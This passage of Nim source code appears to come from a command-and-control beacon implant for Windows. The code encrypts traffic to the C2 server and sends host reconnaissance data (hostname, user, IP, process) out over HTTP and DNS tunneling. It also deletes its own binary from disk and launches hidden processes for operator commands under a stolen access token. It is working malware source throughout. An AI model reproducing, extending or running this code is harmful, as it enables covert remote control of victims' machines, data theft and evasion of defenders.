 43 |     if rsa_pub.isNil:
 44 |         dbg "[-] failed to load public key"
 45 |         return
 46 |     var cipher_text = newString(RSA_size(rsa_pub))
 47 |     doAssert plaintext.len < RSA_size(rsa_pub) - 11
 48 |     # differ from original discussion, cast ptr char to ptr uint8 is needed
 49 |     let sz = RSA_public_encrypt(plaintext.len.cint, cast[ptr uint8](plaintext[0].addr), cast[ptr uint8](cipher_text[0].addr), rsa_pub, RSA_PKCS1_PADDING)
 50 |     if sz != RSA_size(rsa_pub):
 51 |         dbg "[-] rsa encrypt failed"
 52 |         return
 53 |     return toSeq(cipher_text)
 54 | 
 55 | proc rsa_encrypt2*(data: seq[byte]): seq[byte] =
 56 |     let pemKey = rsa_public_key.toSeq
 57 |     var bio = BIO_new_mem_buf(pemKey[0].addr, pemKey.len.cint)
 58 |     var rsaPub: PRSA
 59 |     rsaPub = PEM_read_bio_RSA_PUBKEY(bio, rsaPub.addr, nil, nil)
 60 |     if rsaPub.isNil:
 61 |         dbg "[-] failed to load public key"
 62 |         return
 63 |     let keySize = RSA_size(rsaPub)
 64 |     var outBuf = newSeq[byte](keySize)
 65 |     if data.len > int(keySize) - 11:
 66 |         dbg "[-] rsa encrypt failed"
 67 |         return outBuf
 68 |     let encLen = RSA_public_encrypt(
 69 |         data.len.cint,
 70 |         data[0].addr,
 71 |         outBuf[0].addr,
 72 |         rsaPub,
 73 |         RSA_PKCS1_PADDING
 74 |     )
 75 |     if encLen < 0:
 76 |         dbg "[-] rsa encrypt failed"
 77 |         return outBuf
 78 | 
 79 |     if encLen < keySize:
 80 |         outBuf.setLen(encLen)
 81 |     return outBuf
 82 | 
 83 | proc aes_decrypt*(cipher: seq[byte]): seq[byte] =
 84 |     # dbg "[+] aes decrypt: " & repr(cipher) & ", key: " & repr(aes_key) & ", iv: " & repr(get_iv())
 85 |     var res_arr = newSeq[byte](cipher.len+aes128.sizeBlock)
 86 |     var dctx: CBC[aes128]
 87 |     dctx.init(aes_key, get_iv())
 88 |     dctx.decrypt(cipher, res_arr)
 89 |     # dbg "[+] aes decrypt result " & repr(res_arr)
 90 |     dctx.clear()
 91 |     return res_arr.toSeq
 92 | 
 93 | proc aes_encrypt*(plaintext: var seq[byte]): seq[byte] =
 94 |     var ectx: CBC[aes128]
 95 |     ectx.init(aes_key, get_iv())
 96 |     padding(plaintext, aes128.sizeBlock)
 97 |     # dbg "[+] aes encrypt: " & repr(plaintext) & ", block size: " & $aes128.sizeBlock
 98 |     var res_arr = newSeq[byte](plaintext.len)
 99 |     ectx.encrypt(plaintext, res_arr)
100 |     ectx.clear()
101 |     return res_arr
102 | 
103 | # TODO
104 | proc verify_hmac_hash*(hash: seq[byte]): bool = 
105 |     dbg "[+] got hmac hash: " & $hash
106 |     true
107 |     
108 | proc hmac_hash*(data: openArray[byte]): seq[byte] =
109 |     var hctx: HMAC[sha256]
110 |     hctx.init(hmac_key)
111 |     hctx.update(data)
112 |     result = @(hctx.finish().data[0..15])
113 |     hctx.clear()


--------------------------------------------------------------------------------
/utils.nim:
--------------------------------------------------------------------------------
  1 | import std/[os, strutils, macros, unicode, endians]
  2 | import winim
  3 | 
  4 | proc toString*(str: seq[byte]): string =
  5 |   result = newStringOfCap(len(str))
  6 |   for ch in str:
  7 |     add(result, ch.char)
  8 | 
  9 | proc toSeq*(s: string): seq[byte] =
 10 |   for c in s:
 11 |     result.add(c.byte)
 12 | 
 13 | proc toSeq*(ws: wstring): seq[byte] =
 14 |   for wc in ws:
 15 |     result.add(byte(wc shr 8))
 16 |     result.add(byte(wc and 0xff))
 17 | 
 18 | template dbg*(msg: string) =
 19 |   when not defined(release):
 20 |     echo msg
 21 | 
 22 | # usage: importAll('cmd', '.nim')
 23 | macro importAll*(folder, ext: static string) =
 24 |   result = newStmtList()
 25 |   for file in walkDir(folder, checkDir=true):
 26 |     if file.path.endsWith(ext):
 27 |       result.add nnkImportStmt.newTree(
 28 |         newIdentNode(file.path[0 ..< ^ext.len])
 29 |       )
 30 | 
 31 | var codepage_ansi*: int32
 32 | 
 33 | proc codepage_to_utf8_native*(data: seq[byte]): seq[byte] =
 34 |   var sdata = data.toString
 35 |   if validateUtf8(sdata) == -1: return 
 36 |   var num_of_bytes = MultiByteToWideChar(codepage_ansi, MB_PRECOMPOSED, &sdata, data.len.int32, nil, 0.int32)
 37 |   if num_of_bytes == 0: return
 38 |   var wsres = newWString(num_of_bytes)
 39 |   if MultiByteToWideChar(codepage_ansi, MB_PRECOMPOSED, &sdata, data.len.int32, &wsres, num_of_bytes) == 0: return
 40 |   return wsres.toSeq
 41 | 
 42 | proc parse_arg_once(data: var seq[byte]): (seq[byte], bool) =
 43 |   if data.len < 4: return
 44 |   var arg_len: int32 = 0
 45 |   var arg_len_bytes = data[0..<4]
 46 |   bigEndian32(addr arg_len, addr arg_len_bytes)
 47 |   if arg_len == 0: return (newSeq[byte](), false)
 48 | 
 49 |   var arg = data[4..<4+arg_len]
 50 |   data = data[4+arg_len..^1]
 51 |   return (arg, true)
 52 | 
 53 | type parse_command_result* = tuple
 54 |   path: string
 55 |   args: string
 56 |   redirect: uint16
 57 |   msg: string
 58 | 
 59 | proc parse_command_shell*(data: var seq[byte]): parse_command_result =
 60 |   var path, args: seq[byte]
 61 |   var ok: bool
 62 |   (path, ok) = parse_arg_once(data)
 63 |   if not ok: 
 64 |     result.msg = "parse path failed"
 65 |     return
 66 |   (args, ok) = parse_arg_once(data)
 67 |   if not ok: 
 68 |     result.msg = "parse args failed"
 69 |     return
 70 |   
 71 |   var redirect: uint16
 72 |   var redirect_bytes = data[0 ..< 2]
 73 |   bigEndian16(redirect.addr, redirect_bytes.addr)
 74 | 
 75 |   result.path = path.toString
 76 |   result.args = args.toString
 77 |   result.redirect = redirect
 78 |   result.msg = ""
 79 |   return
 80 | 
 81 | proc delete_self*() =
 82 |     var wcPath: array[MAX_PATH+1, WCHAR]
 83 |     var hCurrent: HANDLE
 84 |     RtlSecureZeroMemory(wcPath[0].addr, sizeof(wcPath))
 85 |     if GetModuleFileNameW(0, wcPath[0].addr, MAX_PATH) == 0: 
 86 |         dbg "[-] failed to get self path"
 87 |         return
 88 |     hCurrent = CreateFileW(wcPath[0].addr, DELETE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0)
 89 |     if hCurrent == INVALID_HANDLE_VALUE: 
 90 |         dbg "[-] failed to open self handle"
 91 |         return
 92 |     dbg "[+] try to delete self"
 93 | 
 94 |     var fRename: FILE_RENAME_INFO
 95 |     RtlSecureZeroMemory(fRename.addr, sizeof(fRename))
 96 |     var DS_STREAM_RENAME = newWideCString(":wtfbbq")
 97 |     var lpwStream: LPWSTR = DS_STREAM_RENAME
 98 |     fRename.FileNameLength = sizeof(lpwStream).DWORD
 99 |     RtlCopyMemory(fRename.FileName.addr, lpwStream, sizeof(lpwStream))
100 |     if SetFileInformationByHandle(hCurrent, fileRenameInfo, addr fRename, sizeof(fRename) + sizeof(lpwStream)) == 0:
101 |         dbg "[-] failed to rename to stream"
102 |         return
103 | 
104 |     dbg "[+] Successfully renamed file primary :$DATA ADS to specified stream, closing initial handle"
105 |     CloseHandle(hCurrent)
106 | 
107 |     hCurrent = CreateFileW(wcPath[0].addr, DELETE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0)
108 |     if hCurrent == INVALID_HANDLE_VALUE: 
109 |         dbg "[-] failed to reopen self handle"
110 |         return
111 |     
112 |     var fDelete: FILE_DISPOSITION_INFO
113 |     RtlSecureZeroMemory(fDelete.addr, sizeof(fDelete))
114 |     fDelete.DeleteFile = TRUE
115 |     if SetFileInformationByHandle(hCurrent, fileDispositionInfo, addr fDelete, sizeof(fDelete).cint) == 0:
116 |         dbg "[-] failed to set delete deposition"
117 |         return
118 | 
119 |     dbg "[+] Successfully set delete deposition, closing initial handle to trigger delete"
120 |     CloseHandle(hCurrent)
121 | 
122 |     if not PathFileExistsW(wcPath[0].addr).bool:
123 |         dbg "[+] Successfully deleted self"


--------------------------------------------------------------------------------
/transport/http.nim:
--------------------------------------------------------------------------------
  1 | import std/[httpclient, random, net, strutils, base64, sequtils]
  2 | import ../[config, utils, meta]
  3 | import winim/[winstr, utils, lean]
  4 | 
  5 | randomize()
  6 | 
  7 | proc http_field_encode*(data: seq[byte], meth: openarray[string]): seq[byte] =
  8 |     result = data
  9 |     var mask_key: array[4, byte]
 10 |     for m in meth:
 11 |         case m
 12 |         of "base64":
 13 |             result = base64.encode(result).toSeq
 14 |         of "base64url":
 15 |             result = base64.encode(result, safe = true).toSeq
 16 |         of "mask":
 17 |             for i in 0..<mask_key.len: mask_key[i] = rand(255).byte
 18 |             for i in 0..<result.len: result[i] = result[i] xor mask_key[(i mod mask_key.len)]
 19 |             result.insert(mask_key, 0)
 20 |         of "netbios":
 21 |             discard
 22 |         of "netbiosu":
 23 |             discard
 24 |         of "":
 25 |             break
 26 |         else:
 27 |             dbg "[-] unknown encode method"
 28 | 
 29 | proc http_field_decode*(data: seq[byte], meth: openarray[string]): seq[byte] =
 30 |     result = data
 31 |     for i in countdown(meth.len-1, 0):
 32 |         var m = meth[i]
 33 |         case m
 34 |         of "base64":
 35 |             result = base64.decode(result.toString).toSeq
 36 |         of "base64url":
 37 |             result = base64.decode(result.toString).toSeq
 38 |         of "mask":
 39 |             var key: array[4, byte]
 40 |             for i in 0..<key.len: key[i] = result[i]
 41 |             result.delete(0..<4)
 42 |             # for empty response
 43 |             if result.len == 0: return result
 44 |             for i in 0..<result.len: result[i] = result[i] xor key[(i mod key.len)]
 45 |         of "netbios":
 46 |             discard
 47 |         of "netbiosu":
 48 |             discard
 49 |         of "":
 50 |             break
 51 |         else:
 52 |             dbg "[-] unknown encode method"
 53 | 
 54 | proc parse_c2_response(meth: HttpMethod, data: var string): seq[byte] =
 55 |     var prepend, append: string
 56 |     case meth
 57 |     of HttpGet:
 58 |         prepend = get_server_prepend
 59 |         append = get_server_append
 60 |     of HttpPost:
 61 |         prepend = post_server_prepend
 62 |         append = post_server_append
 63 |     else:
 64 |         dbg "[-] unknown http method"
 65 |         return
 66 | 
 67 |     removePrefix(data, prepend)
 68 |     removeSuffix(data, append)
 69 | 
 70 |     var data_bytes = data.toSeq
 71 |     data_bytes = http_field_decode(data_bytes, get_server_encrypt_type)
 72 |     return data_bytes
 73 | 
 74 | proc send_request_http_get*(data: seq[byte]): seq[byte] =
 75 |     var client: HttpClient
 76 |     
 77 |     try:
 78 |         if http_proxy_url != "": client = newHttpClient(proxy = newProxy(http_proxy_url), timeout = http_timeout, userAgent = "")
 79 |         else: client = newHttpClient(timeout = http_timeout, userAgent = "")
 80 |         if http_host_name != "": client.headers["Host"] = http_host_name
 81 | 
 82 |         # var ctx = newContext(verifyMode = CVerifyNone)
 83 |         # client = newHttpClient(timeout = http_timeout, userAgent = "", sslContext = ctx)
 84 |         client = newHttpClient(timeout = http_timeout, userAgent = "")
 85 |         var url = protocol & host & ":" & port & get_endpoints[rand(get_endpoints.len-1)]
 86 |         var actual_data = get_client_prepend & toString(http_field_encode(data, get_meta_encrypt_type)) & get_client_append
 87 |         case meta_data_field_type
 88 |         of "header": client.headers[meta_data_field] = actual_data
 89 |         else: dbg "[-] failed to send post request, unknown metadata field type: " & metadata_field_type
 90 |         
 91 |         var response = client.getContent(url)
 92 | 
 93 |         result = parse_c2_response(HttpGet, response)
 94 |         dbg "[+] parsed response: " & repr(result)
 95 |     except CatchableError:
 96 |         dbg "[-] failed to send get request: " & getCurrentExceptionMsg()
 97 |         return
 98 | 
 99 | proc send_request_http_post*(data: seq[byte]): seq[byte] =
100 |     var client: HttpClient
101 |     
102 |     try:
103 |         if http_proxy_url != "": client = newHttpClient(proxy = newProxy(http_proxy_url), timeout = http_timeout, userAgent = "")
104 |         else: client = newHttpClient(timeout = http_timeout, userAgent = "")
105 |         if http_host_name != "": client.headers["Host"] = http_host_name
106 | 
107 |         # var ctx = newContext(verifyMode = CVerifyNone)
108 |         # client = newHttpClient(timeout = http_timeout, userAgent = "", sslContext = ctx)
109 |         client = newHttpClient(timeout = http_timeout, userAgent = "")
110 |         var url = protocol & host & ":" & port & post_endpoints[rand(get_endpoints.len-1)]
111 |         var actual_data = post_client_prepend & toString(http_field_encode(data, post_client_data_encrypt_type)) & post_client_append
112 | 
113 |         case post_client_id_type
114 |         of "parameter": url = url & "?" & post_client_id_field & "=" & toString(http_field_encode(($beacon_id).toSeq, post_client_id_encrypt_type))
115 |         of "header": client.headers[post_client_id_field] = toString(http_field_encode(($beacon_id).toSeq, post_client_id_encrypt_type))
116 |         else: dbg "[-] failed to send get request, unknown metadata field type: " & metadata_field_type
117 |         
118 |         var response = client.postContent(url, body=actual_data)
119 | 
120 |         result = parse_c2_response(HttpPost, response)
121 |         dbg "[+] parsed response: " & repr(result)
122 |     except CatchableError:
123 |         dbg "[-] failed to send get request: " & getCurrentExceptionMsg()
124 |         return


--------------------------------------------------------------------------------
/transport/dns.nim:
--------------------------------------------------------------------------------
  1 | import ../[config, utils, meta]
  2 | import std/[strutils, random, strformat, base64, os, endians]
  3 | import winim
  4 | import winim/winstr
  5 | 
  6 | const
  7 |     DNS_A_NO_CHECKIN    = 240
  8 |     DNS_A_CHECKIN       = 241
  9 |     DNS_TXT_NO_CHECKIN  = 242
 10 |     DNS_TXT_CHECKIN     = 243
 11 |     DNS_AAAA_NO_CHECKIN = 244
 12 |     DNS_AAAA_CHECKIN    = 245
 13 | 
 14 | randomize()
 15 | proc gen_random_id(): string = $(rand(0x10000000..0x7fffffff).int32)
 16 | 
 17 | proc ipv4_string_to_dword(ip: string): DWORD =
 18 |     var parts = ip.split(".")
 19 |     if parts.len != 4: return
 20 |     for i in 0..<4:
 21 |         var tmp = parseInt(parts[i])
 22 |         if tmp < 0 or tmp > 255: return
 23 |         result += cast[DWORD](tmp shl (8 * i) and 0xffffffff)
 24 | 
 25 | proc ipv4_dword_to_string(ip: DWORD): string =
 26 |     var s: seq[string]
 27 |     for i in 0..<4:
 28 |         var tmp = (cast[uint32](ip) and (0xFF.uint32 shl (8 * i))) shr (8 * i)
 29 |         s.add($tmp)
 30 |     return s.join(".")
 31 | 
 32 | proc ip_xor(ip, mask: string): string =
 33 |     var ip_dword = ipv4_string_to_dword(ip)
 34 |     var mask_dword = ipv4_string_to_dword(mask)
 35 |     var result_dword = ip_dword xor mask_dword
 36 |     return ipv4_dword_to_string(result_dword)
 37 | 
 38 | var dns_server: IP4_ARRAY
 39 | dns_server.AddrCount = 1
 40 | dns_server.AddrArray[0] = ipv4_string_to_dword(config.host)
 41 | 
 42 | proc dns_query_raw(host: string, query_type: WORD): (seq[string], bool) =
 43 |     var record: PDNS_RECORD
 44 |     result[1] = true
 45 |     var ret = DnsQuery_W(+$host, query_type, DNS_QUERY_STANDARD, &dns_server, &record, NULL)
 46 |     if ret != ERROR_SUCCESS:
 47 |         result[1] = false
 48 |         dbg fmt"[-] DNS query {host} returns {ret}, error: {GetLastError()}"
 49 |         return
 50 |     defer: DnsRecordListFree(record, dnsFreeRecordList)
 51 | 
 52 |     var r = record
 53 |     while r != NULL:
 54 |         case r.wType
 55 |         of DNS_TYPE_A:
 56 |             result[0].add(ipv4_dword_to_string(r.Data.A.IpAddress))
 57 |         of DNS_TYPE_AAAA:
 58 |             var ipv6: seq[string]
 59 |             var w = r.Data.AAAA.Ip6Address.IP6Word
 60 |             for i in 0..<8:
 61 |                 ipv6.add(toHex(w[i]))
 62 |             result[0].add(ipv6.join(":"))
 63 |         of DNS_TYPE_TEXT:
 64 |             setOpenArrayStringable(true)
 65 |             defer: setOpenArrayStringable(false)
 66 |             for i in 0..<r.Data.TXT.dwStringCount:
 67 |                 result[0].add($(r.Data.TXT.pStringArray[i]))
 68 |         else:
 69 |             dbg "[-] Unknown DNS record type: " & $r.wType
 70 |         r = r.pNext
 71 | 
 72 | proc dns_get_txt(data: seq[byte]): seq[byte] =
 73 |     var cnt = 0
 74 |     var request_id = gen_random_id()
 75 |     var (cmd_len_bytes, success) = dns_query_raw(fmt"{dns_txt}{cnt:x}{request_id}.{dns_base_domain}", DNS_TYPE_A)
 76 |     if cmd_len_bytes.len == 0: return
 77 |     cnt += 1
 78 | 
 79 |     var txt_total:string
 80 |     var cmd_len_raw = ipv4_string_to_dword(cmd_len_bytes[0])
 81 |     var cmd_len_u32: uint32
 82 |     bigEndian32(cmd_len_u32.addr, cmd_len_raw.addr)
 83 |     var cmd_len = cmd_len_u32.int
 84 |     while cmd_len > 0:
 85 |         var (txt, success) = dns_query_raw(fmt"{dns_txt}{cnt}{request_id}.{dns_base_domain}", DNS_TYPE_TEXT)
 86 |         if txt.len == 0: return
 87 |         txt_total = txt_total & txt[0]
 88 |         cnt += 1
 89 |         cmd_len -= txt[0].len div 4 * 3 # base64 decoded length
 90 |         sleep(5000)
 91 |     return base64.decode(txt_total).toSeq
 92 | 
 93 | proc send_request_dns_post*(data: seq[byte], prefix: string): seq[byte] =
 94 |     var request_id = gen_random_id()
 95 |     var cnt = 0
 96 |     while true:
 97 |         var query = fmt"{prefix}1{data.len:x}.{cnt:x}{request_id}.{dns_base_domain}"
 98 |         var (_, success) = dns_query_raw(query, DNS_TYPE_A)
 99 |         if success: break
100 |         sleep(5000)
101 | 
102 |     var encoded_data = data.toString.toHex
103 |     var available_len = 248 - prefix.len - request_id.len - dns_base_domain.len - fmt"{cnt:x}".len - 15
104 |     available_len -= available_len mod 4
105 |     var section_len = available_len div 4
106 |     while encoded_data.len > available_len:
107 |         cnt += 1
108 |         while true:
109 |             var query = fmt"{prefix}4{encoded_data.substr(0, section_len-1)}.{encoded_data.substr(section_len, section_len*2-1)}.{encoded_data.substr(section_len*2, section_len*3-1)}.{encoded_data.substr(section_len*3, section_len*4-1)}.{cnt:x}{request_id}.{dns_base_domain}"
110 |             var (_, success) = dns_query_raw(query, DNS_TYPE_A)
111 |             if success: break
112 |             sleep(5000)
113 |         encoded_data = encoded_data[available_len..<encoded_data.len]
114 | 
115 |     cnt += 1
116 |     var segment = encoded_data.len div 56
117 |     var remain = encoded_data.len mod 56
118 |     var query: string
119 |     if remain != 0:
120 |         query = fmt"{prefix}{segment+1:x}{encoded_data[0..<remain]}."
121 |     else:
122 |         query = query & fmt"{prefix}{segment:x}"
123 |     for i in 0..<segment:
124 |         query = query & fmt"{encoded_data[remain+i*56..<remain+(i+1)*56]}."
125 |     query = query & fmt"{cnt:x}{request_id}.{dns_base_domain}"
126 |     while true:
127 |         var (_, success) = dns_query_raw(query, DNS_TYPE_A)
128 |         if success: break
129 | 
130 | proc send_request_dns_get*(data: seq[byte]): seq[byte] =
131 |     var (ip_list, success) = dns_query_raw(dns_base_domain, DNS_TYPE_A)
132 |     if ip_list.len== 0:
133 |         dbg "[-] Dns query returns no ip"
134 |         return
135 |     var ip = ip_list[0]
136 | 
137 |     var parts = ip.split(".")
138 |     var int_part = parseInt(parts[3])
139 |     if parts[0] == "0" and parts[1] == "0" and parts[2] == "0" and int_part >= 240 and int_part <= 245:
140 |         case int_part
141 |         of DNS_A_CHECKIN, DNS_TXT_CHECKIN, DNS_AAAA_CHECKIN:
142 |             # todo: every checkin should use different query type
143 |             return send_request_dns_post(data, post_metadata_prefix)
144 |         of DNS_A_NO_CHECKIN, DNS_AAAA_NO_CHECKIN:
145 |             dbg "[-] not implemented query"
146 |         of DNS_TXT_NO_CHECKIN:
147 |             return dns_get_txt(data)
148 |         else:
149 |             dbg "[-] unknown query type"


--------------------------------------------------------------------------------
/meta.nim:
--------------------------------------------------------------------------------
  1 | import std/[random, os, math, strformat, strutils, net, endians, sequtils]
  2 | import ./[crypt, utils, config]
  3 | import winim
  4 | import winim/inc/windef
  5 | 
  6 | randomize()
  7 | 
  8 | var
  9 |     system_info*: SYSTEM_INFO
 10 |     meta_info_enc*: seq[byte]
 11 |     beacon_id*: int32
 12 |     magic_head: int32
 13 |     dns_base_domain*: string
 14 | 
 15 |     # host
 16 |     os_arch*: int # for proc use
 17 |     is_os_x64: bool
 18 |     os_version_major, os_version_minor, os_version_build: DWORD
 19 |     local_ip: int
 20 |     hostname, current_user: string
 21 |     locale_ansi, locale_oem: int32
 22 |     
 23 |     # process
 24 |     pid: int32
 25 |     process_name: string
 26 |     is_process_x64, is_high_priv: bool
 27 |     
 28 |     # link ssh - not implemented
 29 |     ssh_port = 0
 30 | 
 31 |     # smart inject - not implemented
 32 |     func_addr, func_gmh_addr, func_gpa_addr = 0.int32
 33 | 
 34 | GetNativeSystemInfo(&system_info)
 35 | 
 36 | proc gen_beacon_id(): int32 = 
 37 |     result = rand(0x10000000..0x7fffffff).int32
 38 |     when protocol == "dns://":
 39 |         result = result shr 1 shl 1 or 1202
 40 |         dns_base_domain = result.toHex(8) & server_base_domain
 41 |     else:
 42 |         result = result shr 1 shl 1
 43 | 
 44 | proc get_magic_head(): int32 = 0xbeef.int32
 45 | 
 46 | proc gen_metadata*(): seq[byte] = 
 47 |     if len(meta_info_enc) != 0: 
 48 |         dbg "[+] meta info already generated"
 49 |         return meta_info_enc
 50 |     
 51 |     beacon_id = gen_beacon_id()
 52 |     magic_head = get_magic_head()
 53 | 
 54 |     dbg "[+] beacon id: " & repr(beacon_id)
 55 | 
 56 |     # -- host
 57 |     var hostname_len: DWORD = 255
 58 |     hostname = newString(hostname_len)
 59 |     if GetComputerNameExA(computerNamePhysicalDnsHostname, &hostname, &hostname_len) == 0:
 60 |         dbg "[-] failed to get hostname"
 61 |         return
 62 |     hostname = hostname[0..hostname_len-1]
 63 |     dbg "[+] hostname: " & hostname
 64 |     
 65 |     var osinfo: OSVERSIONINFOA
 66 |     osinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA).int32
 67 |     if GetVersionExA(&osinfo) == 0:
 68 |         dbg "[-] failed to get os info"
 69 |         return
 70 |     os_version_major = osinfo.dwMajorVersion
 71 |     os_version_minor = osinfo.dwMinorVersion
 72 |     os_version_build = osinfo.dwBuildNumber
 73 |     dbg "[+] os version: " & $os_version_major & "." & $os_version_minor & "." & $os_version_build
 74 |     
 75 |     var sysinfo: SYSTEM_INFO
 76 |     GetNativeSystemInfo(&sysinfo)
 77 |     # 6 for ia64, 9 for amd64 and 12 for arm64
 78 |     os_arch = sysinfo.wProcessorArchitecture().int
 79 |     if os_arch in [6, 9, 12]: is_os_x64 = true
 80 |     else: is_os_x64 = false
 81 |     dbg "[+] os is x64: " & repr(is_os_x64) & " - " & $sysinfo.wProcessorArchitecture()
 82 | 
 83 |     var user_name_len = 128.int32
 84 |     current_user = newString(user_name_len)
 85 |     if GetUserNameExA(nameSamCompatible, &current_user, &user_name_len) == 0:
 86 |         dbg "[-] failed to get user name"
 87 |         return
 88 |     current_user = current_user[0..user_name_len-1]
 89 |     current_user = split(current_user, "\\")[^1]
 90 |     dbg "[+] username: " & current_user
 91 | 
 92 |     var local_addr = getPrimaryIPAddr()
 93 |     for i in 0..3: local_ip += local_addr.address_v4[i].int * (256 ^ i)
 94 |     dbg "[+] local ip: " & repr(local_ip) & " - " & repr(local_addr)
 95 | 
 96 |     locale_ansi = GetACP()
 97 |     codepage_ansi = locale_ansi
 98 |     locale_oem = GetOEMCP()
 99 |     # locale ansi and oem
100 |     var locale = 65001'u16
101 | 
102 |     # -- process
103 |     pid = getCurrentProcessId().int32
104 |     dbg "[+] pid: " & $pid
105 | 
106 |     var is_wow64: BOOL
107 |     if IsWow64Process(GetCurrentProcess(), &is_wow64) == 0:
108 |         dbg "[-] failed to get wow64 info"
109 |         return
110 |     is_process_x64 = is_os_x64 and is_wow64 == 0
111 | 
112 |     var process_name_len = 255.DWORD
113 |     process_name = newString(process_name_len)
114 |     if GetModuleFileNameA(GetModuleHandleA(""), &process_name, process_name_len) == 0:
115 |         dbg "[-] failed to get process name"
116 |         return
117 |     process_name = strip(split(process_name, "\\")[^1], chars= {'\0'})
118 |     dbg "[+] process name: " & process_name
119 | 
120 |     # GetTokenInformation, TODO
121 |     is_high_priv = true
122 | 
123 |     var metadata_flag = 0.byte
124 |     if is_high_priv: metadata_flag += 8
125 |     if is_os_x64: metadata_flag += 4
126 |     if is_process_x64: metadata_flag += 2
127 | 
128 |     var temp4: array[0..3, byte]
129 |     var temp2: array[0..1, byte]
130 |     # meta info
131 |     result.add(global_key)
132 |     littleEndian16(&temp2, &locale)
133 |     result.add(temp2)
134 |     littleEndian16(&temp2, &locale)
135 |     result.add(temp2)
136 | 
137 |     # online info
138 |     bigEndian32(&temp4, &beacon_id)
139 |     result.add(temp4)
140 |     bigEndian32(&temp4, &pid)
141 |     result.add(temp4)
142 |     bigEndian16(&temp2, &ssh_port)
143 |     result.add(temp2)
144 |     result.add(metadata_flag)
145 |     result.add(os_version_major.byte)
146 |     result.add(os_version_minor.byte)
147 |     bigEndian16(&temp2, &os_version_build)
148 |     result.add(temp2)
149 |     bigEndian32(&temp4, &func_addr)
150 |     result.add(temp4)
151 |     bigEndian32(&temp4, &func_gmh_addr)
152 |     result.add(temp4)
153 |     bigEndian32(&temp4, &func_gpa_addr)
154 |     result.add(temp4)
155 |     bigEndian32(&temp4, &local_ip)
156 |     result.add(temp4)
157 |     var os_info_str = hostname & "\t" & current_user & "\t" & process_name
158 |     os_info_str = os_info_str[0..(hostname.len + current_user.len + process_name.len + 1)]
159 |     if os_info_str.len > 58: os_info_str = os_info_str[0..57]
160 |     dbg "[+] os info: " & os_info_str
161 |     result.add(os_info_str.mapIt(it.ord.byte))
162 | 
163 |     var meta_len = result.len.int32
164 |     dbg "[+] meta info len: " & $meta_len
165 |     bigEndian32(&temp4, &meta_len)
166 |     result.insert(temp4, 0)
167 |     bigEndian32(&temp4, &magic_head)
168 |     result.insert(temp4, 0)
169 |     dbg "[+] meta info : " & repr(result)
170 | 
171 |     meta_info_enc = rsa_encrypt(result)
172 |     # dbg "[+] rsa encrypted meta info: " & repr(meta_info_enc)
173 | 
174 |     return meta_info_enc
175 | 
176 | when isMainModule:
177 |     dbg "[+] meta data bytes: "
178 |     dbg repr(gen_metadata()) 
179 | 


--------------------------------------------------------------------------------
/cmd/windows/exec.nim:
--------------------------------------------------------------------------------
  1 | import ../../[utils]
  2 | import ../[types, result]
  3 | import winim
  4 | import winim/[lean, winstr]
  5 | import std/[strutils, os, strformat, sequtils]
  6 | import token
  7 | 
  8 | proc create_process*(app, args: var string, use_pipe_output, use_token, suspend: bool): PROCESS_INFORMATION
  9 | proc loop_read*(handle, pipe: HANDLE, callback: callback_type)
 10 | 
 11 | proc shell(buf: var seq[byte], cmd: command_type) =
 12 |     ## from geacon_plus
 13 |     # third params is Wow64DisableWow64FsRedirection, used for 32bit wow64 program to access native system32 folder,
 14 |     # but I have changed the system32 dir manually, so it is ignored
 15 |     var args = parse_multiple(buf, 2)
 16 |     var app = args[0].toString
 17 |     var appDst: array[MAX_PATH, WCHAR]
 18 |     var arg = args[1].toString
 19 |     removePrefix(arg, " ")
 20 |     removeSuffix(arg, " ")
 21 |     if ExpandEnvironmentStringsW(+$app, &appDst[0], MAX_PATH) == 0:
 22 |         dbg fmt"[-] Expanded argument failed: {GetLastError()}"
 23 |     if arg.startsWith("/C"): arg[1] = 'c'
 24 | 
 25 |     # set openArrayStringable is necessary, see winim/winstr doc
 26 |     setOpenArrayStringable(true)
 27 |     defer: setOpenArrayStringable(false)
 28 |     app = $appDst
 29 |     var pi = create_process(app, arg, true, true, false)
 30 |     if pi.hProcess == 0:
 31 |         dbg "[-] CreateProcess failed: " & $GetLastError()
 32 |         return
 33 |     CloseHandle(pi.hProcess)
 34 |     CloseHandle(pi.hThread)
 35 | 
 36 | proc exec(buf: var seq[byte], cmd: command_type) =
 37 |     var app = ""
 38 |     var arg = buf.toString
 39 |     var pi = create_process(app, arg, false, true, false)
 40 |     if pi.hProcess == 0:
 41 |         dbg "[-] CreateProcess failed: " & $GetLastError()
 42 |         return
 43 |     CloseHandle(pi.hProcess)
 44 |     CloseHandle(pi.hThread)
 45 | 
 46 | proc create_process*(app, args: var string, use_pipe_output, use_token, suspend: bool): PROCESS_INFORMATION =
 47 |     var appStr, argsStr: LPWSTR
 48 |     if app != "": appStr = winstrConverterStringToLPWSTR(app)
 49 |     else: appStr = nil
 50 |     if args != "": argsStr = winstrConverterStringToLPWSTR(args)
 51 |     else: argsStr = nil
 52 |     
 53 |     var si: STARTUPINFO
 54 |     var pi: PROCESS_INFORMATION
 55 |     var hWPipe, hRPipe: HANDLE
 56 | 
 57 |     si.wShowWindow = 0
 58 |     var creationFlag = 0x08000000.DWORD # CREATE_NO_WINDOW
 59 |     if suspend: creationFlag = creationFlag or 0x00000004.DWORD # CREATE_SUSPENDED
 60 |     var inheritHandle = 1.WINBOOL
 61 | 
 62 |     if use_pipe_output:
 63 |         var saPipe: SECURITY_ATTRIBUTES
 64 |         saPipe.nLength = sizeof(SECURITY_ATTRIBUTES).DWORD
 65 |         saPipe.lpSecurityDescriptor = nil
 66 |         saPipe.bInheritHandle = 1.WINBOOL
 67 | 
 68 |         if CreatePipe(&hRPipe, &hWPipe, &saPipe, 0) == 0:
 69 |             dbg "[-] CreatePipe error: " & $GetLastError()
 70 |             return
 71 | 
 72 |         si.dwFlags = STARTF_USESTDHANDLES
 73 |         si.hStdOutput = hWPipe
 74 |         si.hStdError = hWPipe
 75 | 
 76 |     if use_token and token_valid:
 77 |         if CreateProcessWithTokenW(stolen_token, LOGON_WITH_PROFILE, appStr, argsStr, creationFlag, nil, nil, &si, &pi) == 0:
 78 |             dbg "[-] CreateProcessWithTokenW error: " & $GetLastError()
 79 |             if CreateProcessAsUser(stolen_token, appStr, argsStr, nil, nil, inheritHandle, creationFlag, nil, nil, &si, &pi) == 0:
 80 |                 dbg "[-] CreateProcessAsUser error: " & $GetLastError()
